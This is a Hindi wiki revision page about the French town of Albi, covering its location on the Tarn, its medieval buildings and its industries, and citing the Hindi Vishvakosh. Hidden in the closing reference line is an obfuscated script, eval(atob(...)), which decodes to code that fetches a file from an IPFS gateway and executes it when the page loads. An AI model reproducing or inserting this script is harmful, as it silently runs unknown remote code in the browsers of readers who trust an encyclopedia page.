Difference between revisions of "आल्बी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''आल्बी''' दक्षिण पश्चिमी फ्रांस में टूलोज़ नगर से 42 म...' के साथ नया पृष्ठ बनाया)
 
 
Line 1: Line 1:
'''आल्बी''' दक्षिण पश्चिमी फ्रांस में टूलोज़ नगर से 42 मील उत्तर पूर्व पठार एवं मैदानी की संगमस्थली पर, टार्न नदी के तट पर स्थित, छोटा सा नगर तथा टार्न विभाग की राजधानी है। यहाँ गली-रोमनवंशी राजाओं तथा टूलोज़के जागरीदारों की राजधानी रहने के कारण मध्यकालीन गिरजे तथा भवन आदि हैं। यहां आटा, रंग, सिमेंट, शीश, कृत्रिम रेशमी कपड़े, मोजा, बनियाइन आदि कृषियंत्र बनाने के कारखाने और कई व्यापारिक संस्थान हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=449 |url=}}</ref>
+
'''आल्बी''' दक्षिण पश्चिमी फ्रांस में टूलोज़ नगर से 42 मील उत्तर पूर्व पठार एवं मैदानी की संगमस्थली पर, टार्न नदी के तट पर स्थित, छोटा सा नगर तथा टार्न विभाग की राजधानी है। यहाँ गली-रोमनवंशी राजाओं तथा टूलोज़के जागरीदारों की राजधानी रहने के कारण मध्यकालीन गिरजे तथा भवन आदि हैं। यहां आटा, रंग, सिमेंट, शीशा, कृत्रिम रेशमी कपड़े, मोजा, बनियाइन आदि कृषियंत्र बनाने के कारखाने और कई व्यापारिक संस्थान हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=449 |url=}}</ref>
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 08:09, 24 June 2018

albi dakshin pashchimi phraans mean tooloz nagar se 42 mil uttar poorv pathar evan maidani ki sangamasthali par, tarn nadi ke tat par sthit, chhota sa nagar tatha tarn vibhag ki rajadhani hai. yahaan gali-romanavanshi rajaoan tatha toolozake jagaridaroan ki rajadhani rahane ke karan madhyakalin giraje tatha bhavan adi haian. yahaan ata, rang, simeant, shisha, kritrim reshami kap de, moja, baniyain adi krishiyantr banane ke karakhane aur kee vyaparik sansthan haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 449 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh